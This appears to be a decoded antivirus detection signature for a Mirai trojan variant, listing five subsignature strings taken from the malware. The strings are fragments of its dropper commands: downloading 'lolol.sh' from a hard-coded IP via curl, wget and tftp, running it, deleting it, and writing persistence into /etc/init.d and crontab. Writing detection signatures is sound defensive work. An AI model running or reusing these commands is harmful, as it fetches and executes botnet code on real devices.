VIRUS NAME: Unix.Trojan.Mirai-9883787-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: (0|1)&(2&3&4)
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
olol.sh && tftp -r lolol.sh -g 212.192.241.72 && chmod 777 lolol.sh && sh lolol.sh && rm -rf lolol.sh'> /etc/init.d/drop
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
&& echo 'cd /tmp && curl -O http://212.192.241.72/lolol.sh && wget http://212.192.241.72/lolol.sh && chmod 777 lolol.sh && sh l
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ybox wget http://212.192.241.72/lolol.sh && chmod 777 lolol.sh && sh lolol.sh && rm -rf lolol.sh && tftp 212.192.241.72 -c get l
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
echo 'drop -b -c /etc/crontab'> /etc/init.d/drop
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
olol.sh && rm -rf lolol.sh && wget http://212.192.241.72/lolol.sh && chmod 777 lolol.sh && sh lolol.sh && rm -rf lolol.sh && bus
